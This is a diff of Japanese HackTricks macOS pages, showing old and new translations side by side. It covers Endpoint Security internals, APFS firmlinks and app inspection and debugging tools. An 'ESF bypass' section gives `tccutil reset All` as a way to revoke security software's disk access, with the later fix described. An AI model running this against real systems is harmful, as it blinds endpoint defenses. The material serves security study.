別のシステムデーモンである**`sysextd`**は、システム拡張を検証し、適切なシステムロケーションに移動します。その後、関連するデーモンに拡張機能のロードを依頼します。**`SystemExtensions.framework`** は、システム拡張のアクティベーションと非アクティベーションを担当します。
別のシステムデーモンである**`sysextd`**は、システム拡張機能を検証し、適切なシステムの場所に移動します。その後、関連するデーモンに拡張機能の読み込みを要求します。**`SystemExtensions.framework`**は、システム拡張機能の有効化と無効化を担当します。
## ESFをバイパスする
## ESFのバイパス
ESFは、レッドチームを検出しようとするセキュリティツールによって使用されます。したがって、これを回避する方法に関する情報は興味深いものです。
ESFは、レッドチームを検出しようとするセキュリティツールによって使用されるため、これを回避する方法に関する情報は興味深いものです。
### CVE-2021-30965
セキュリティアプリケーションは**フルディスクアクセス権限**を持っている必要があります。したがって、攻撃者がそれを削除できれば、ソフトウェアの実行を防ぐことができます。
重要なのは、セキュリティアプリケーションが**完全ディスクアクセス権限**を持っている必要があることです。したがって、攻撃者がそれを削除できれば、ソフトウェアの実行を防ぐことができます。
```bash
tccutil reset All
```
このバイパスと関連する情報については、[#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI)のトークをご覧ください。
**詳細情報**については、この回避策および関連するものをチェックしてください:[#OBTS v5.0: "The Achilles Heel of EndpointSecurity" - Fitzl Csaba](https://www.youtube.com/watch?v=lQO7tvNCoTI)
最終的には、新しい権限**`kTCCServiceEndpointSecurityClient`**をセキュリティアプリに与え、**`tccd`**によって管理されることで、`tccutil`がその権限をクリアして実行を防ぐことがないように修正されました。
最終的には、**`tccd`**によって管理されるセキュリティアプリに新しい権限 **`kTCCServiceEndpointSecurityClient`** を与えることで、`tccutil` がアプリの権限をクリアしないようにし、実行を妨げることが修正されました。
## 参考文献
@ -92,14 +92,14 @@ tccutil reset All
<details>
<summary><strong>AWSのハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)** で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの**会社を広告したい、または**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
* **HackTricks で企業を宣伝したい**、または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローしてください
* **HackTricks** および **HackTricks Cloud** のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください
</details>

56
macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md
View file

@ -2,40 +2,40 @@
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックす
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つけ
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする。
* **ハッキングテクニックを共有するためにPRを送信して** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のgithubリポジトリに。
</details>
## Apple独自のファイルシステム (APFS)
## Apple Propietary File System (APFS)
APFS、またはApple File Systemは、Apple Inc.によって開発された現代的なファイルシステムで、**パフォーマンス、セキュリティ、効率の向上**に重点を置いて、古い階層型ファイルシステムプラス(HFS+)を置き換えるために設計されました。
**Apple File System (APFS)** は、Hierarchical File System Plus (HFS+) を置き換えるために設計された現代的なファイルシステムです。その開発は、**改善されたパフォーマンス、セキュリティ、効率性**の必要性によって推進されました。
APFSの注目すべき特徴には以下のものがあります:
APFSのいくつかの注目すべき機能には次のものがあります:
1. **スペース共有**: APFSは、単一の物理デバイス上の**同じ基盤となる空き容量を複数のボリュームで共有する**ことを可能にします。これにより、手動でのリサイズや再パーティショニングなしにボリュームが動的に拡大・縮小できるため、より効率的なスペース利用が可能になります。
1. これは、従来のファイルディスクのパーティションと比較して、**APFSでは異なるパーティションボリュームが全てのディスクスペースを共有する**ことを意味し、通常のパーティションは固定サイズを持っていました
2. **スナップショット**: APFSは**スナップショットの作成**をサポートしており、これは**読み取り専用**の、ファイルシステムの時点のインスタンスです。スナップショットは、追加のストレージをほとんど消費せず、迅速に作成または復元できるため、効率的なバックアップと簡単なシステムロールバックを可能にします。
3. **クローン**: APFSは、元のファイルが変更されるまで、**同じストレージを共有するファイルまたはディレクトリのクローンを作成**できます。この機能は、ストレージスペースを複製することなく、ファイルやディレクトリのコピーを効率的に作成する方法を提供します。
4. **暗号化**: APFSは**フルディスク暗号化**をネイティブにサポートするとともに、ファイルごと、ディレクトリごとの暗号化もサポートし、さまざまな使用状況におけるデータセキュリティを強化します。
5. **クラッシュ保護**: APFSは、突然の電源喪失やシステムクラッシュの場合でもファイルシステムの整合性を保証する**コピー・オン・ライトのメタデータスキーム**を使用しており、データの破損リスクを減らします。
1. **スペース共有**: APFSは、1つの物理デバイス上で複数のボリュームが**同じ基礎の空きストレージを共有**できるようにします。これにより、ボリュームは手動でのリサイズや再パーティショニングが必要なく、動的に成長および縮小できるため、効率的なスペース利用が可能となります。
1. これは、通常のパーティションがファイルディスク内の異なるパーティション(ボリューム)がすべてディスクスペースを共有するのに対して、**APFSでは異なるパーティションボリュームがすべてのディスクスペースを共有**することを意味します
2. **スナップショット**: APFSは**スナップショットの作成**をサポートしており、これはファイルシステムの**読み取り専用**の特定時点のインスタンスです。スナップショットにより、追加のストレージを最小限に消費し、迅速に作成または元に戻すことができるため、効率的なバックアップとシステムのロールバックが可能となります。
3. **クローン**: APFSは、元のファイルが変更されるまで、**同じストレージを共有するファイルまたはディレクトリのクローンを作成**できます。この機能により、ストレージスペースを複製せずにファイルやディレクトリのコピーを効率的に作成する方法が提供されます。
4. **暗号化**: APFSは、完全なディスク暗号化だけでなく、ファイルごとやディレクトリごとの暗号化を**ネイティブでサポート**しており、さまざまなユースケースでデータセキュリティを向上させています。
5. **クラッシュ保護**: APFSは、ファイルシステムの一貫性を確保する**コピー時書き込みメタデータスキーム**を使用しており、突然の停電やシステムクラッシュの場合でもデータの破損リスクを減らし、ファイルシステムの一貫性を確保します。
全体として、APFSはAppleデバイスにとってより現代的で柔軟で効率的なファイルシステムを提供し、パフォーマンス、信頼性、セキュリティの向上に焦点を当てています。
全体として、APFSは、Appleデバイス向けにより現代的で柔軟かつ効率的なファイルシステムを提供し、パフォーマンス、信頼性、セキュリティの向上に焦点を当てています。
```bash
diskutil list # Get overview of the APFS volumes
```
## ファームリンク
## Firmlinks
`Data` ボリュームは **`/System/Volumes/Data`** にマウントされています(`diskutil apfs list` で確認できます)。
`Data`ボリュームは**`/System/Volumes/Data`**にマウントされています(`diskutil apfs list`で確認できます)。
ファームリンクのリストは **`/usr/share/firmlinks`** ファイルで見つけることができます。
ファームリンクのリストは**`/usr/share/firmlinks`**ファイルにあります。
```bash
cat /usr/share/firmlinks
/AppleInternal AppleInternal
@ -43,18 +43,4 @@ cat /usr/share/firmlinks
/Library Library
[...]
```
**左**には**System volume**上のディレクトリパスがあり、**右**にはそれが**Data volume**上でマッピングされるディレクトリパスがあります。したがって、`/library` --> `/system/Volumes/data/library`
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でゼロからヒーローまでのAWSハッキングを学ぶ</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks) および [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
左側には**システムボリューム**上のディレクトリパスがあり、右側には**データボリューム**上でのマッピングされたディレクトリパスがあります。つまり、`/library` --> `/system/Volumes/data/library`

226
macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View file

@ -1,16 +1,16 @@
# macOSアプリ - 検査、デバッグ、ファジング
# macOSアプリ - 検査、デバッグ、およびFuzzing
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でAWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**PEASSファミリー**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **ハッキングテクニックを共有するために、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
@ -32,9 +32,11 @@ objdump -m --full-contents /bin/ls # Dump every section
objdump -d /bin/ls # Dissasemble the binary
objdump --disassemble-symbols=_hello --x86-asm-syntax=intel toolsdemo #Disassemble a function using intel flavour
```
{% endcode %}
### jtool2
このツールは、**codesign**、**otool**、および **objdump** の**代替**として使用でき、いくつかの追加機能を提供します。[**こちらからダウンロードしてください**](http://www.newosxbook.com/tools/jtool.html)、または `brew` でインストールします
このツールは、**codesign**、**otool**、**objdump**の**代替**として使用でき、いくつかの追加機能を提供します。[**こちらからダウンロード**](http://www.newosxbook.com/tools/jtool.html)するか、`brew`を使用してインストールしてください
```bash
# Install
brew install --cask jtool2
@ -54,7 +56,7 @@ jtool2 -d __DATA.__const myipc_server | grep MIG
### Codesign / ldid
{% hint style="danger" %}
**`Codesign`** は **macOS** で見つけることができ、**`ldid`** は **iOS** で見つけることができます
**`Codesign`** は **macOS** に、一方 **`ldid`** は **iOS** に見つかります
{% endhint %}
```bash
# Get signer
@ -84,61 +86,58 @@ ldid -S/tmp/entl.xml <binary>
```
### SuspiciousPackage
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) は、インストールする前に **.pkg** ファイル(インストーラー)の中身を調べるのに役立つツールです。\
これらのインストーラーには、マルウェアの作者が通常、**マルウェアを永続化するために悪用する** `preinstall``postinstall` のbashスクリプトが含まれています。
[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html)は、**.pkg**ファイル(インストーラー)を検査し、インストールする前に中身を確認するのに役立つツールです。\
これらのインストーラーには、通常、マルウェア作者が悪用する`preinstall`および`postinstall` bashスクリプトが含まれており、**マルウェアを** **持続化**するために悪用されます。
### hdiutil
このツールは、何かを実行する前に Apple のディスクイメージ(**.dmg**)ファイルを**マウント**して調べることができます:
このツールを使用すると、Appleディスクイメージ**.dmg**)ファイルを**マウント**して、実行する前にそれらを検査することができます。
```bash
hdiutil attach ~/Downloads/Firefox\ 58.0.2.dmg
```
`/Volumes`にマウントされます。
### Objective-C
#### メタデータ
{% hint style="danger" %}
Objective-Cで書かれたプログラムは、[Mach-Oバイナリ](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)に**コンパイルされた時に**、クラス宣言を**保持**することに注意してください。このクラス宣言には以下が**含まれます**
Objective-Cで書かれたプログラムは、[Mach-Oバイナリ](../macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md)にコンパイルされる際に、クラス宣言を**保持**します。このようなクラス宣言には、以下の情報が含まれます
* クラスの名前
* クラス
* クラスメソッド
* クラスインスタンス変数
* クラスのインスタンス変数
{% endhint %}
この情報は[**class-dump**](https://github.com/nygard/class-dump)を使用して取得できます:
[class-dump](https://github.com/nygard/class-dump)を使用して、この情報を取得できます。
```bash
class-dump Kindle.app
```
この名前は、バイナリのリバースエンジニアリングをより困難にするために難読化されている可能性があります。
#### 関数の呼び出し
#### 関数呼び出し
Objective-Cを使用するバイナリで関数が呼び出されると、コンパイルされたコードはその関数を直接呼び出すのではなく、**`objc_msgSend`** を呼び出します。これが最終的な関数を呼び出します:
Objective-Cを使用するバイナリで関数が呼び出されると、コンパイルされたコードはその関数を呼び出す代わりに**`objc_msgSend`**を呼び出します。これにより、最終的な関数が呼び出されます:
![](<../../../.gitbook/assets/image (560).png>)
この関数が期待するパラメータは以下の通りです:
この関数が期待するパラメータは次のとおりです:
* 最初のパラメータ(**self**)は「**メッセージを受け取るクラスのインスタンスを指すポインタ**」です。もっと簡単に言うと、メソッドが呼び出されているオブジェクトです。メソッドがクラスメソッドの場合、これはクラスオブジェクト(全体)のインスタンスになりますが、インスタンスメソッドの場合、selfはクラスのインスタンス化されたインスタンスを指します。
* 2番目のパラメータ**op**)は「メッセージを処理するメソッドのセレクタ」です。再び簡単に言うと、これは単に**メソッドの名前**です。
* 残りのパラメータは、メソッドによって**必要とされる値**ですop
- 最初のパラメータ (**self**) は、「**メッセージを受け取るクラスのインスタンスを指すポインタ**」です。簡単に言うと、メソッドが呼び出されるオブジェクトです。メソッドがクラスメソッドの場合、これはクラスオブジェクトのインスタンス(全体として)、インスタンスメソッドの場合、selfはクラスのインスタンスとしてインスタンス化されたインスタンスを指します。
- 2番目のパラメータ (**op**) は、「メッセージを処理するメソッドのセレクタ」です。単に言うと、これは**メソッドの名前**です。
- 残りのパラメータは、メソッドで必要な**値**ですop
| **引数** | **レジスタ** | **(for) objc\_msgSend** |
| **引数** | **レジスタ** | **(for) objc\_msgSend** |
| ----------------- | --------------------------------------------------------------- | ------------------------------------------------------ |
| **1番目の引数** | **rdi** | **self: メソッドが呼び出されているオブジェクト** |
| **2番目の引数** | **rsi** | **op: メソッドの名前** |
| **3番目の引数** | **rdx** | **メソッドへの1番目の引数** |
| **4番目の引数** | **rcx** | **メソッドへの2番目の引数** |
| **5番目の引数** | **r8** | **メソッドへの3番目の引数** |
| **6番目の引数** | **r9** | **メソッドへの4番目の引数** |
| **7番目以降の引数** | <p><strong>rsp+</strong><br><strong>(スタック上)</strong></p> | **メソッドへの5番目以降の引数** |
| **1番目の引数** | **rdi** | **self: メソッドが呼び出されるオブジェクト** |
| **2番目の引数** | **rsi** | **op: メソッドの名前** |
| **3番目の引数** | **rdx** | **メソッドへの最初の引数** |
| **4番目の引数** | **rcx** | **メソッドへの2番目の引数** |
| **5番目の引数** | **r8** | **メソッドへの3番目の引数** |
| **6番目の引数** | **r9** | **メソッドへの4番目の引数** |
| **7番目以降の引数** | <p><strong>rsp+</strong><br><strong>(スタック上)</strong></p> | **メソッドへの5番目以降の引数** |
### Swift
Swiftバイナリでは、Objective-Cとの互換性があるため、時々[class-dump](https://github.com/nygard/class-dump/)を使用して宣言を抽出できますが、常に可能とは限りません。
Swiftバイナリでは、Objective-C互換性があるため、[class-dump](https://github.com/nygard/class-dump/)を使用して宣言を抽出することができますが、常にではありません。
**`jtool -l`****`otool -l`** コマンドラインを使用すると、**`__swift5`** プレフィックスで始まるいくつかのセクションを見つけることができます:
**`jtool -l`**または**`otool -l`**コマンドラインを使用すると、**`__swift5`**接頭辞で始まる複数のセクションを見つけることができます。
```bash
jtool2 -l /Applications/Stocks.app/Contents/MacOS/Stocks
LC 00: LC_SEGMENT_64 Mem: 0x000000000-0x100000000 __PAGEZERO
@ -150,9 +149,9 @@ Mem: 0x100027064-0x1000274cc __TEXT.__swift5_fieldmd
Mem: 0x1000274cc-0x100027608 __TEXT.__swift5_capture
[...]
```
これらのセクションに保存されている情報についての詳細は、[**このブログ投稿**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html)で見つけることができます。
さらなる情報は、[**このブログポスト**](https://knight.sc/reverse%20engineering/2019/07/17/swift-metadata.html)でこのセクションに保存されている情報について見つけることができます。
さらに、**Swiftバイナリにはシンボルが含まれることがあります**(例えば、ライブラリは関数を呼び出すためにシンボルを保存する必要があります)。**シンボルには通常、関数名と属性に関する情報が不格好な方法で含まれています**ので、非常に有用であり、元の名前を取得できる"**デマングラー**"があります:
さらに、**Swiftバイナリにはシンボルが含まれる可能性があります**(たとえば、ライブラリは関数を呼び出すためにシンボルを保存する必要があります)。**シンボルには通常、関数名と属性に関する情報が含まれており、見た目は醜いですが、非常に役立ちます。**そして、**"デマングラー"**が元の名前を取得できる可能性があります。
```bash
# Ghidra plugin
https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py
@ -160,63 +159,63 @@ https://github.com/ghidraninja/ghidra_scripts/blob/master/swift_demangler.py
# Swift cli
swift demangle
```
### パッされたバイナリ
### パッキングされたバイナリ
* 高エントロピーをチェックする
* 文字列をチェックする(ほとんど理解できる文字列がない場合、パックされている)
* MacOS用のUPXパッカーは、"\_\_XHDR"というセクションを生成します
- 高いエントロピーをチェックする
- 文字列をチェックする(理解できる文字列がほとんどない場合、パッキングされている可能性がある)
- MacOS用のUPXパッカーは"\_\_XHDR"というセクションを生成する
## 動的分
## ダイナミック解
{% hint style="warning" %}
バイナリをデバッグするためには、**SIPを無効にする必要があります**`csrutil disable`または`csrutil enable --without debug`を実行)またはバイナリを一時フォルダにコピーし、**署名を削除します** `codesign --remove-signature <binary-path>`を使用するか、バイナリのデバッグを許可します([このスクリプト](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)を使用できます)
バイナリをデバッグするには、**SIPを無効にする**必要があります(`csrutil disable`または`csrutil enable --without debug`)またはバイナリを一時フォルダにコピーして`codesign --remove-signature <binary-path>`で署名を削除するか、バイナリのデバッグを許可します([このスクリプト](https://gist.github.com/carlospolop/a66b8d72bb8f43913c4b5ae45672578b)を使用できます)
{% endhint %}
{% hint style="warning" %}
システムバイナリ(例えば`cloudconfigurationd`)を**インストルメントする**ためには、macOS上で**SIPを無効にする必要があります**(署名を削除するだけでは機能しません)。
macOS上の`cloudconfigurationd`などの**システムバイナリ**を**インストール**するには、**SIPを無効**にする必要があります(署名を削除するだけでは機能しません)。
{% endhint %}
### 統合ログ
MacOSは、アプリケーションが実行されている際に非常に役立つ多くのログを生成します。**何をしているのか**を理解しようとするときに特に有用です
MacOSは多くのログを生成しますが、これらはアプリケーションを実行しているときに非常に役立ちます。**何をしているのか**を理解しようとする。
さらに、いくつかのログには`<private>`タグが含まれており、**ユーザー**や**コンピューター**の**識別可能な**情報を**隠します**。しかし、この情報を開示するための**証明書をインストールすることが可能です**。[**こちら**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log)から説明に従ってください。
さらに、一部のログには`<private>`というタグが含まれ、**ユーザー**や**コンピューター**の**識別可能な情報**を**非表示**にするものがあります。ただし、**この情報を開示するための証明書をインストール**することが可能です。[**こちら**](https://superuser.com/questions/1532031/how-to-show-private-data-in-macos-unified-log)説明に従ってください。
### Hopper
#### 左パネル
Hopperの左パネルでは、バイナリのシンボル**ラベル**)、手続きと関数のリスト(**Proc**)、文字列(**Str**)を見ることができます。これらはMac-Oファイルのいくつかの部分例えば_cstringや`objc_methname`)で定義されている文字列のすべてではありません
Hopperの左パネルでは、バイナリのシンボル**ラベル**)、手続きと関数のリスト(**Proc**)、および文字列(**Str**)を見ることができます。これらはすべての文字列ではありませんが、Mac-Oファイルのさまざまな部分で定義されているものです_cstringまたは`objc_methname`
#### 中央パネル
中央パネルでは、**逆アセンブルされたコード**を見ることができます。そして、それぞれのアイコンをクリックすることで、**生の**逆アセンブル、**グラフ**として、**デコンパイルされた**コード、**バイナリ**として見ることができます:
中央パネルでは、**逆アセンブルされたコード**を見ることができます。また、**生の**逆アセンブル、**グラフ**、**逆コンパイル**、**バイナリ**を見ることができます。それぞれのアイコンをクリックして切り替えます:
<figure><img src="../../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
コードオブジェクトを右クリックすると、そのオブジェクトへ/からの**参照**を見ることができたり、その名前を変更することができます(デコンパイルされた擬似コードでは機能しません):
コードオブジェクトを右クリックすると、そのオブジェクトへの**参照**や名前の変更を見ることができます(逆コンパイルされた擬似コードでは機能しません):
<figure><img src="../../../.gitbook/assets/image (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
さらに、**中央下部でPythonコマンドを書くことができます**
さらに、**中央下部にPythonコマンドを記述**することができます
#### 右パネル
右パネルでは、**ナビゲーション履歴**(現在の状況にどのように到達したかを知ることができます)、**コールグラフ**(この関数を呼び出すすべての関数と、この関数が呼び出すすべての関数を見ることができます)、**ローカル変数**の情報など、興味深い情報を見ることができます。
右パネルでは、**ナビゲーション履歴**(現在の状況に到達するまでの経緯を把握するため)、この関数を**呼び出すすべての関数**とこの関数が**呼び出すすべての関数**を表示する**コールグラフ**、**ローカル変数**情報など、興味深い情報を見ることができます。
### dtrace
dtraceは、非常に**低レベル**でアプリケーションにアクセスすることをユーザーに許可し、プログラムを**トレース**したり、実行フローを変更することさえできます。dtraceは、システムコールの開始と終了などの場所にあるカーネル全体に**配置された** **プローブ**を使用します。
これにより、ユーザーは非常に**低レベル**でアプリケーションにアクセスでき、プログラムを**トレース**したり、実行フローを変更したりする方法を提供します。 Dtraceは、システムコールの開始と終了などの場所に配置される**プローブ**を使用します。
DTraceは、各システムコールに対してプローブを作成するために**`dtrace_probe_create`**関数を使用します。これらのプローブは、各システムコールの**入口と出口で発火**することができます。DTraceとのやり取りは/dev/dtraceを通じて行われ、これはrootユーザーのみが利用可能です。
DTraceは、各システムコールの**入口と出口**でプローブを作成するために**`dtrace_probe_create`**関数を使用します。これらのプローブは、各システムコールの**入口と出口**で発火することができます。DTraceとのやり取りは、ルートユーザー専用の/dev/dtraceを介して行われます。
{% hint style="success" %}
SIP保護を完全に無効にせずにDtraceを有効にするには、リカバリーモードで次のコマンドを実行します:`csrutil enable --without dtrace`
SIP保護を完全に無効にせずにDtraceを有効にするには、回復モードで次のコマンドを実行できます:`csrutil enable --without dtrace`
また、**`dtrace`**や**`dtruss`**を、**自分でコンパイルした**バイナリに対して使用することもできます。
また、**コンパイルしたバイナリ**の**`dtrace`**または**`dtruss`**を実行できます。
{% endhint %}
dtraceの利用可能なプローブは、次の方法で取得できます:
dtraceの利用可能なプローブは、次のコマンドで取得できます:
```bash
dtrace -l | head
ID PROVIDER MODULE FUNCTION NAME
@ -226,17 +225,17 @@ ID PROVIDER MODULE FUNCTION NAME
43 profile profile-97
44 profile profile-199
```
プローブ名は4つの部分で構成されています: プロバイダー、モジュール、関数、名前 (`fbt:mach_kernel:ptrace:entry`)。名前の一部を指定しない場合、Dtraceはその部分をワイルドカードとして適用します。
プローブ名は、プロバイダー、モジュール、関数、および名前(`fbt:mach_kernel:ptrace:entry`の4つの部分で構成されています。名前の一部を指定しない場合、Dtraceはその部分をワイルドカードとして適用します。
DTraceを設定してプローブをアクティブにし、それらが発火したときに実行するアクションを指定するには、D言語を使用する必要があります。
プローブをアクティブにし、それらが発火したときに実行するアクションを指定するには、D言語を使用する必要があります。
より詳細な説明と例については、[https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html)で見つけることができます。
詳細な説明やさらなる例は、[https://illumos.org/books/dtrace/chp-intro.html](https://illumos.org/books/dtrace/chp-intro.html) で見つけることができます。
#### 例
`man -k dtrace` を実行して、**利用可能なDTraceスクリプト**をリストします。例: `sudo dtruss -n binary`
`man -k dtrace` を実行して、**利用可能なDTraceスクリプト**をリストアップします。例: `sudo dtruss -n binary`
* 行内
* 1行で
```bash
#Count the number of syscalls of each running process
sudo dtrace -n 'syscall:::entry {@[execname] = count()}'
@ -286,50 +285,50 @@ dtruss -c -p 1000 #get syscalls of PID 1000
```
### ktrace
**SIPが有効になっていても**これを使用できます
これは**SIPが有効**の状態でも使用できます。
```bash
ktrace trace -s -S -t c -c ls | grep "ls("
```
### ProcessMonitor
[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) は、プロセスが実行しているプロセス関連のアクションをチェックするのに非常に便利なツールです(例えば、プロセスが作成する新しいプロセスを監視します)。
[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor)は、プロセスが実行しているプロセス関連のアクションをチェックするための非常に便利なツールです(たとえば、プロセスが作成している新しいプロセスを監視します)。
### SpriteTree
[**SpriteTree**](https://themittenmac.com/tools/) は、プロセス間の関係を出力するツールです。\
**`sudo eslogger fork exec rename create > cap.json`** のようなコマンドでmacを監視する必要がありますこのコマンドを起動するターミナルにはFDAが必要です。その後、このツールでjsonを読み込むと、すべての関係を確認できます:
[**SpriteTree**](https://themittenmac.com/tools/)は、プロセス間の関係を表示するツールです。\
**`sudo eslogger fork exec rename create > cap.json`** のようなコマンドでMacを監視する必要がありますこのコマンドを実行するためにはFDAが必要です。その後、このツールでjsonをロードしてすべての関係を表示できます:
<figure><img src="../../../.gitbook/assets/image (710).png" alt="" width="375"><figcaption></figcaption></figure>
### FileMonitor
[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) は、ファイルイベント(作成、変更、削除など)を監視し、そのようなイベントに関する詳細情報を提供することができます。
[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor)は、ファイルイベント(作成、変更、削除など)を監視し、そのようなイベントに関する詳細情報を提供ます。
### Crescendo
